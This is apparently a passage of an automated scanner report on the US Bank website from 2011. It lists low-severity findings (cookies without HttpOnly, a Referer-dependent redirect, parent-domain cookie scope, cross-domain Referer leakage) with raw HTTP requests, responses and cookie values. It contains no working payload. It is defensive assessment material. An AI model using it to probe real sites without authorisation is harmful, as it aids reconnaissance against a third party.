Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: USBHOMEPAGEPREF=; s_vi=[CS]v1|26C050D4051D2B35-40000128C02942DC[CE]; mbox=check#true#1300278129|session#1300278068498-162067#1300279929; CookieEnabled=true; s_pers=%20s_vnum%3D1473075619545%2526vn%253D1%7C1473075619545%3B%20s_lv%3D1300278074758%7C1394886074758%3B%20s_lv_s%3DFirst%2520Visit%7C1300279874758%3B%20s_nr%3D1300278074763-New%7C1473078074763%3B%20s_invisit%3Dtrue%7C1300279874764%3B%20sc_visit_start%3D1%7C1300279874766%3B%20s_visitStart%3Dno%2520value%7C1300279874768%3B%20s_prevPage%3Dusb%253Achecking%253Aindex.html%7C1300279874769%3B; s_sess=%20s_linkTrack%3DPersonal%2520Home%2520Page%255E%255EChecking%255E%255EPersonal%2520Home%2520Page%2520%257C%2520Checking%255E%255E%3B%20s_ria%3Dflash%252010%257Csilverlight%25204.0%3B%20s_ppv%3D73%3B%20s_cc%3Dtrue%3B%20SiteC_LINKS%3Dusb%253Achecking%253Aindex.html%255E%255ELog%2520In%2520to%2520Your%2520Account%255E%255Eusb%253Achecking%253Aindex.html%2520%257C%2520Log%2520In%2520to%2520Your%2520Account%255E%255E%3B%20s_sq%3Dusbankcom%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fwww.usbank.com%2525252Fchecking%2525252Findex.html%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww4.usbank.com%2525252FinternetBanking%2525252FRequestRouter%2525253FrequestCmdId%2525253DDisplayLoginPage_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; CAMPID=""; WT_FPC=id=268076e74370df281811300264817909:lv=1300267334847:ss=1300267327521
Content-Length: 121

ui_mode=question&charset=UTF-8&language=en&restriction.level.collections=Collections.FullUnsecuredUSbank&question_box=xss

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 7438
Content-Type: text/html; charset=UTF-8; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: CAMPID=r3043; expires=Tue, 16-Mar-2021 12:22:20 GMT; domain=.usbank.com; path=/
Set-Cookie: iq%5Fid=393865430%2E7055475; path=/search
Set-Cookie: CAMPIDTYPE=0; expires=Tue, 16-Mar-2021 12:22:20 GMT; domain=.usbank.com; path=/
Set-Cookie: ASPSESSIONIDCASCAARB=FJNPIFCAPMOEIKCCBPPHBAAB; path=/
X-Powered-By: ASP.NET
Date: Wed, 16 Mar 2011 12:22:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="/en/style/glob
...[SNIP]...

2.9. http://www.usbank.com/usbanklocations/LanguageController  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.usbank.com
Path:   /usbanklocations/LanguageController

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usbanklocations/LanguageController?target=search&language=es HTTP/1.1
Host: www.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_lv%3D1300275619538%7C1394883619538%3B%20s_lv_s%3DFirst%2520Visit%7C1300277419538%3B%20s_nr%3D1300275619542-New%7C1473075619542%3B%20s_vnum%3D1473075619545%2526vn%253D1%7C1473075619545%3B%20s_invisit%3Dtrue%7C1300277419545%3B%20sc_visit_start%3D1%7C1300277419564%3B%20s_visitStart%3D1%7C1300277419566%3B%20s_prevPage%3DPersonal%2520Home%2520Page%7C1300277419567%3B; WT_FPC=id=268076e74370df281811300264817909:lv=1300264817909:ss=1300264817909; s_sess=%20s_cc%3Dtrue%3B%20s_linkTrack%3D%3B%20s_sq%3D%3B%20s_ppv%3D77%3B; s_vi=[CS]v1|26C050D4051D2B35-40000128C02942DC[CE]; USBHOMEPAGEPREF=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html; charset=ISO-8859-1
Content-Language: es
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: JSESSIONID=00004FoA-jF_i-zN2rstltnCFTj:-1; Path=/usbanklocations
Server: WebSphere Application Server/6.1
X-Powered-By: ASP.NET
Date: Wed, 16 Mar 2011 11:59:49 GMT
Connection: close
Content-Length: 25381


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...

2.10. http://www.usbank.com/usbanklocations/remoteSearch.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.usbank.com
Path:   /usbanklocations/remoteSearch.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usbanklocations/remoteSearch.jsp HTTP/1.1
Host: www.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_lv%3D1300275619538%7C1394883619538%3B%20s_lv_s%3DFirst%2520Visit%7C1300277419538%3B%20s_nr%3D1300275619542-New%7C1473075619542%3B%20s_vnum%3D1473075619545%2526vn%253D1%7C1473075619545%3B%20s_invisit%3Dtrue%7C1300277419545%3B%20sc_visit_start%3D1%7C1300277419564%3B%20s_visitStart%3D1%7C1300277419566%3B%20s_prevPage%3DPersonal%2520Home%2520Page%7C1300277419567%3B; WT_FPC=id=268076e74370df281811300264817909:lv=1300264817909:ss=1300264817909; s_sess=%20s_cc%3Dtrue%3B%20s_linkTrack%3D%3B%20s_sq%3D%3B%20s_ppv%3D77%3B; s_vi=[CS]v1|26C050D4051D2B35-40000128C02942DC[CE]; USBHOMEPAGEPREF=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: JSESSIONID=0000eESGuwZMmy8oqW3bu0Rc3VK:-1; Path=/usbanklocations
Server: WebSphere Application Server/6.1
X-Powered-By: ASP.NET
Date: Wed, 16 Mar 2011 11:59:49 GMT
Connection: close
Content-Length: 25301


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...

2.11. http://www.usbank.com/usbanklocations/search.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.usbank.com
Path:   /usbanklocations/search.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usbanklocations/search.jsp HTTP/1.1
Host: www.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_lv%3D1300275619538%7C1394883619538%3B%20s_lv_s%3DFirst%2520Visit%7C1300277419538%3B%20s_nr%3D1300275619542-New%7C1473075619542%3B%20s_vnum%3D1473075619545%2526vn%253D1%7C1473075619545%3B%20s_invisit%3Dtrue%7C1300277419545%3B%20sc_visit_start%3D1%7C1300277419564%3B%20s_visitStart%3D1%7C1300277419566%3B%20s_prevPage%3DPersonal%2520Home%2520Page%7C1300277419567%3B; WT_FPC=id=268076e74370df281811300264817909:lv=1300264817909:ss=1300264817909; s_sess=%20s_cc%3Dtrue%3B%20s_linkTrack%3D%3B%20s_sq%3D%3B%20s_ppv%3D77%3B; s_vi=[CS]v1|26C050D4051D2B35-40000128C02942DC[CE]; USBHOMEPAGEPREF=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: JSESSIONID=0000xKzLZqL906maofleVYD1nP7:-1; Path=/usbanklocations
Server: WebSphere Application Server/6.1
X-Powered-By: ASP.NET
Date: Wed, 16 Mar 2011 11:59:48 GMT
Connection: close
Content-Length: 25173


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...

2.12. http://www.usbank.com/redirectcentral.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usbank.com
Path:   /redirectcentral.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /redirectcentral.cfm?redirectid=5343 HTTP/1.1
Host: www.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_lv%3D1300275619538%7C1394883619538%3B%20s_lv_s%3DFirst%2520Visit%7C1300277419538%3B%20s_nr%3D1300275619542-New%7C1473075619542%3B%20s_vnum%3D1473075619545%2526vn%253D1%7C1473075619545%3B%20s_invisit%3Dtrue%7C1300277419545%3B%20sc_visit_start%3D1%7C1300277419564%3B%20s_visitStart%3D1%7C1300277419566%3B%20s_prevPage%3DPersonal%2520Home%2520Page%7C1300277419567%3B; WT_FPC=id=268076e74370df281811300264817909:lv=1300264817909:ss=1300264817909; s_sess=%20s_cc%3Dtrue%3B%20s_linkTrack%3D%3B%20s_sq%3D%3B%20s_ppv%3D77%3B; s_vi=[CS]v1|26C050D4051D2B35-40000128C02942DC[CE]; USBHOMEPAGEPREF=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: CAMPIDTYPE=9999;domain=.usbank.com;expires=Fri, 08-Mar-2041 12:00:15 GMT;path=/
Set-Cookie: CAMPID=r5343;domain=.usbank.com;expires=Fri, 08-Mar-2041 12:00:15 GMT;path=/
Set-Cookie: CAMPIDTYPE=0;domain=.usbank.com;expires=Fri, 08-Mar-2041 12:00:15 GMT;path=/
X-Powered-By: ASP.NET
Date: Wed, 16 Mar 2011 12:00:15 GMT
Connection: close
Content-Length: 516


<html>
<head>
<title>Redirect</title>
<script language="JavaScript" type="text/javascript" src="/js/global/global.js"></script>

<script language="JavaScript1.1">
   <!--
   location.replace(
...[SNIP]...

3. Referer-dependent response  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.usbank.com
Path:   /redirectcentral.cfm

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

Request 1

GET /redirectcentral.cfm?redirectid=2952 HTTP/1.1
Host: www.usbank.com
Proxy-Connection: keep-alive
Referer: http://www.usbank.com/search/default.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: USBHOMEPAGEPREF=; s_vi=[CS]v1|26C050D4051D2B35-40000128C02942DC[CE]; mbox=check#true#1300278129|session#1300278068498-162067#1300279929; CookieEnabled=true; s_pers=%20s_vnum%3D1473075619545%2526vn%253D1%7C1473075619545%3B%20s_lv%3D1300278074758%7C1394886074758%3B%20s_lv_s%3DFirst%2520Visit%7C1300279874758%3B%20s_nr%3D1300278074763-New%7C1473078074763%3B%20s_invisit%3Dtrue%7C1300279874764%3B%20sc_visit_start%3D1%7C1300279874766%3B%20s_visitStart%3Dno%2520value%7C1300279874768%3B%20s_prevPage%3Dusb%253Achecking%253Aindex.html%7C1300279874769%3B; s_sess=%20s_linkTrack%3DPersonal%2520Home%2520Page%255E%255EChecking%255E%255EPersonal%2520Home%2520Page%2520%257C%2520Checking%255E%255E%3B%20s_ria%3Dflash%252010%257Csilverlight%25204.0%3B%20s_ppv%3D73%3B%20s_cc%3Dtrue%3B%20SiteC_LINKS%3Dusb%253Achecking%253Aindex.html%255E%255ELog%2520In%2520to%2520Your%2520Account%255E%255Eusb%253Achecking%253Aindex.html%2520%257C%2520Log%2520In%2520to%2520Your%2520Account%255E%255E%3B%20s_sq%3Dusbankcom%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fwww.usbank.com%2525252Fchecking%2525252Findex.html%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww4.usbank.com%2525252FinternetBanking%2525252FRequestRouter%2525253FrequestCmdId%2525253DDisplayLoginPage_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; CAMPID=r3043; CAMPIDTYPE=0; ASPSESSIONIDCASCAARB=EJNPIFCAFJEOAJKAMCLADIJM; WT_FPC=id=268076e74370df281811300264817909:lv=1300267338779:ss=1300267327521

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: CAMPID=r2952;domain=.usbank.com;expires=Fri, 08-Mar-2041 12:22:26 GMT;path=/
Set-Cookie: CAMPIDTYPE=0;domain=.usbank.com;expires=Fri, 08-Mar-2041 12:22:26 GMT;path=/
X-Powered-By: ASP.NET
Date: Wed, 16 Mar 2011 12:22:26 GMT
Content-Length: 668


<html>
<head>
<title>Redirect</title>
<script language="JavaScript" type="text/javascript" src="/js/global/global.js"></script>

<script language="JavaScript1.1">
   <!--
   location.replace("https://www4.usbank.com/internetBanking/RequestRouter?requestCmdId=DisplayLoginPage&icid=SS_2952&WT.mc_id=r2952&original_ref=http%3A%2F%2Fwww%2Eusbank%2Ecom%2Fsearch%2Fdefault%2Easp");
   //-->
</script>
<meta http-equiv="REFRESH" content="0;URL=https://www4.usbank.com/internetBanking/RequestRouter?requestCmdId=DisplayLoginPage&icid=SS_2952&WT.mc_id=r2952&original_ref=http%3A%2F%2Fwww%2Eusbank%2Ecom%2Fsearch%2Fdefault%2Easp">

</head>
<body>
</body>
</html>

Request 2

GET /redirectcentral.cfm?redirectid=2952 HTTP/1.1
Host: www.usbank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: USBHOMEPAGEPREF=; s_vi=[CS]v1|26C050D4051D2B35-40000128C02942DC[CE]; mbox=check#true#1300278129|session#1300278068498-162067#1300279929; CookieEnabled=true; s_pers=%20s_vnum%3D1473075619545%2526vn%253D1%7C1473075619545%3B%20s_lv%3D1300278074758%7C1394886074758%3B%20s_lv_s%3DFirst%2520Visit%7C1300279874758%3B%20s_nr%3D1300278074763-New%7C1473078074763%3B%20s_invisit%3Dtrue%7C1300279874764%3B%20sc_visit_start%3D1%7C1300279874766%3B%20s_visitStart%3Dno%2520value%7C1300279874768%3B%20s_prevPage%3Dusb%253Achecking%253Aindex.html%7C1300279874769%3B; s_sess=%20s_linkTrack%3DPersonal%2520Home%2520Page%255E%255EChecking%255E%255EPersonal%2520Home%2520Page%2520%257C%2520Checking%255E%255E%3B%20s_ria%3Dflash%252010%257Csilverlight%25204.0%3B%20s_ppv%3D73%3B%20s_cc%3Dtrue%3B%20SiteC_LINKS%3Dusb%253Achecking%253Aindex.html%255E%255ELog%2520In%2520to%2520Your%2520Account%255E%255Eusb%253Achecking%253Aindex.html%2520%257C%2520Log%2520In%2520to%2520Your%2520Account%255E%255E%3B%20s_sq%3Dusbankcom%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fwww.usbank.com%2525252Fchecking%2525252Findex.html%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww4.usbank.com%2525252FinternetBanking%2525252FRequestRouter%2525253FrequestCmdId%2525253DDisplayLoginPage_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; CAMPID=r3043; CAMPIDTYPE=0; ASPSESSIONIDCASCAARB=EJNPIFCAFJEOAJKAMCLADIJM; WT_FPC=id=268076e74370df281811300264817909:lv=1300267338779:ss=1300267327521

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: CAMPID=r2952;domain=.usbank.com;expires=Fri, 08-Mar-2041 12:22:39 GMT;path=/
Set-Cookie: CAMPIDTYPE=0;domain=.usbank.com;expires=Fri, 08-Mar-2041 12:22:39 GMT;path=/
X-Powered-By: ASP.NET
Date: Wed, 16 Mar 2011 12:22:39 GMT
Content-Length: 556


<html>
<head>
<title>Redirect</title>
<script language="JavaScript" type="text/javascript" src="/js/global/global.js"></script>

<script language="JavaScript1.1">
   <!--
   location.replace("https://www4.usbank.com/internetBanking/RequestRouter?requestCmdId=DisplayLoginPage&icid=SS_2952&WT.mc_id=r2952&original_ref=");
   //-->
</script>
<meta http-equiv="REFRESH" content="0;URL=https://www4.usbank.com/internetBanking/RequestRouter?requestCmdId=DisplayLoginPage&icid=SS_2952&WT.mc_id=r2952&original_ref=">

</head>
<body>
</body>
</html>

4. Cookie scoped to parent domain  previous  next
There are 2 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


4.1. http://www.usbank.com/redirectcentral.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usbank.com
Path:   /redirectcentral.cfm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /redirectcentral.cfm?redirectid=5343 HTTP/1.1
Host: www.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_lv%3D1300275619538%7C1394883619538%3B%20s_lv_s%3DFirst%2520Visit%7C1300277419538%3B%20s_nr%3D1300275619542-New%7C1473075619542%3B%20s_vnum%3D1473075619545%2526vn%253D1%7C1473075619545%3B%20s_invisit%3Dtrue%7C1300277419545%3B%20sc_visit_start%3D1%7C1300277419564%3B%20s_visitStart%3D1%7C1300277419566%3B%20s_prevPage%3DPersonal%2520Home%2520Page%7C1300277419567%3B; WT_FPC=id=268076e74370df281811300264817909:lv=1300264817909:ss=1300264817909; s_sess=%20s_cc%3Dtrue%3B%20s_linkTrack%3D%3B%20s_sq%3D%3B%20s_ppv%3D77%3B; s_vi=[CS]v1|26C050D4051D2B35-40000128C02942DC[CE]; USBHOMEPAGEPREF=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: CAMPIDTYPE=9999;domain=.usbank.com;expires=Fri, 08-Mar-2041 12:00:15 GMT;path=/
Set-Cookie: CAMPID=r5343;domain=.usbank.com;expires=Fri, 08-Mar-2041 12:00:15 GMT;path=/
Set-Cookie: CAMPIDTYPE=0;domain=.usbank.com;expires=Fri, 08-Mar-2041 12:00:15 GMT;path=/
X-Powered-By: ASP.NET
Date: Wed, 16 Mar 2011 12:00:15 GMT
Connection: close
Content-Length: 516


<html>
<head>
<title>Redirect</title>
<script language="JavaScript" type="text/javascript" src="/js/global/global.js"></script>

<script language="JavaScript1.1">
   <!--
   location.replace(
...[SNIP]...

4.2. http://www.usbank.com/search/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usbank.com
Path:   /search/default.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /search/default.asp HTTP/1.1
Host: www.usbank.com
Proxy-Connection: keep-alive
Referer: http://www.usbank.com/en/personal/PersonalCustomerService.cfm
Cache-Control: max-age=0
Origin: http://www.usbank.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: USBHOMEPAGEPREF=; s_vi=[CS]v1|26C050D4051D2B35-40000128C02942DC[CE]; mbox=check#true#1300278129|session#1300278068498-162067#1300279929; CookieEnabled=true; s_pers=%20s_vnum%3D1473075619545%2526vn%253D1%7C1473075619545%3B%20s_lv%3D1300278074758%7C1394886074758%3B%20s_lv_s%3DFirst%2520Visit%7C1300279874758%3B%20s_nr%3D1300278074763-New%7C1473078074763%3B%20s_invisit%3Dtrue%7C1300279874764%3B%20sc_visit_start%3D1%7C1300279874766%3B%20s_visitStart%3Dno%2520value%7C1300279874768%3B%20s_prevPage%3Dusb%253Achecking%253Aindex.html%7C1300279874769%3B; s_sess=%20s_linkTrack%3DPersonal%2520Home%2520Page%255E%255EChecking%255E%255EPersonal%2520Home%2520Page%2520%257C%2520Checking%255E%255E%3B%20s_ria%3Dflash%252010%257Csilverlight%25204.0%3B%20s_ppv%3D73%3B%20s_cc%3Dtrue%3B%20SiteC_LINKS%3Dusb%253Achecking%253Aindex.html%255E%255ELog%2520In%2520to%2520Your%2520Account%255E%255Eusb%253Achecking%253Aindex.html%2520%257C%2520Log%2520In%2520to%2520Your%2520Account%255E%255E%3B%20s_sq%3Dusbankcom%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fwww.usbank.com%2525252Fchecking%2525252Findex.html%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww4.usbank.com%2525252FinternetBanking%2525252FRequestRouter%2525253FrequestCmdId%2525253DDisplayLoginPage_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; CAMPID=""; WT_FPC=id=268076e74370df281811300264817909:lv=1300267334847:ss=1300267327521
Content-Length: 121

ui_mode=question&charset=UTF-8&language=en&restriction.level.collections=Collections.FullUnsecuredUSbank&question_box=xss

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 7438
Content-Type: text/html; charset=UTF-8; Charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: CAMPID=r3043; expires=Tue, 16-Mar-2021 12:22:20 GMT; domain=.usbank.com; path=/
Set-Cookie: iq%5Fid=393865430%2E7055475; path=/search
Set-Cookie: CAMPIDTYPE=0; expires=Tue, 16-Mar-2021 12:22:20 GMT; domain=.usbank.com; path=/
Set-Cookie: ASPSESSIONIDCASCAARB=FJNPIFCAPMOEIKCCBPPHBAAB; path=/
X-Powered-By: ASP.NET
Date: Wed, 16 Mar 2011 12:22:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="/en/style/glob
...[SNIP]...

5. Cross-domain Referer leakage  previous  next
There are 3 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


5.1. http://www.usbank.com/cgi_w/cfm/personal/sub_global/online_statements.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usbank.com
Path:   /cgi_w/cfm/personal/sub_global/online_statements.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cgi_w/cfm/personal/sub_global/online_statements.cfm?src=MgAcctMM HTTP/1.1
Host: www.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_lv%3D1300275619538%7C1394883619538%3B%20s_lv_s%3DFirst%2520Visit%7C1300277419538%3B%20s_nr%3D1300275619542-New%7C1473075619542%3B%20s_vnum%3D1473075619545%2526vn%253D1%7C1473075619545%3B%20s_invisit%3Dtrue%7C1300277419545%3B%20sc_visit_start%3D1%7C1300277419564%3B%20s_visitStart%3D1%7C1300277419566%3B%20s_prevPage%3DPersonal%2520Home%2520Page%7C1300277419567%3B; WT_FPC=id=268076e74370df281811300264817909:lv=1300264817909:ss=1300264817909; s_sess=%20s_cc%3Dtrue%3B%20s_linkTrack%3D%3B%20s_sq%3D%3B%20s_ppv%3D77%3B; s_vi=[CS]v1|26C050D4051D2B35-40000128C02942DC[CE]; USBHOMEPAGEPREF=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 16 Mar 2011 12:00:03 GMT
Connection: close
Content-Length: 21058


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>


<title>Online Statements</title>

<link rel="stylesheet" href="/en/legacy/style/global/global.css" type="text
...[SNIP]...
<li class="contentcopy"><a class="contentcopy" href="https://carenet.fnfismd.com/usbank/ACCLogin.jsp">Login to the Loan Servicing Center</a>
...[SNIP]...
</ul>
           Not enrolled in the Mortgage Loan Servicing Center yet? <a class="contentcopy" href="https://carenet.fnfismd.com/usbank/ACCLogin.jsp">Enroll now</a>
...[SNIP]...

5.2. http://www.usbank.com/en/personal/products_and_services/onlinebanking.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usbank.com
Path:   /en/personal/products_and_services/onlinebanking.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en/personal/products_and_services/onlinebanking.cfm?src=BankingMM HTTP/1.1
Host: www.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_lv%3D1300275619538%7C1394883619538%3B%20s_lv_s%3DFirst%2520Visit%7C1300277419538%3B%20s_nr%3D1300275619542-New%7C1473075619542%3B%20s_vnum%3D1473075619545%2526vn%253D1%7C1473075619545%3B%20s_invisit%3Dtrue%7C1300277419545%3B%20sc_visit_start%3D1%7C1300277419564%3B%20s_visitStart%3D1%7C1300277419566%3B%20s_prevPage%3DPersonal%2520Home%2520Page%7C1300277419567%3B; WT_FPC=id=268076e74370df281811300264817909:lv=1300264817909:ss=1300264817909; s_sess=%20s_cc%3Dtrue%3B%20s_linkTrack%3D%3B%20s_sq%3D%3B%20s_ppv%3D77%3B; s_vi=[CS]v1|26C050D4051D2B35-40000128C02942DC[CE]; USBHOMEPAGEPREF=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 16 Mar 2011 11:59:45 GMT
Connection: close
Content-Length: 25342


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=117565&p=irol-news">Press Releases</a>
...[SNIP]...
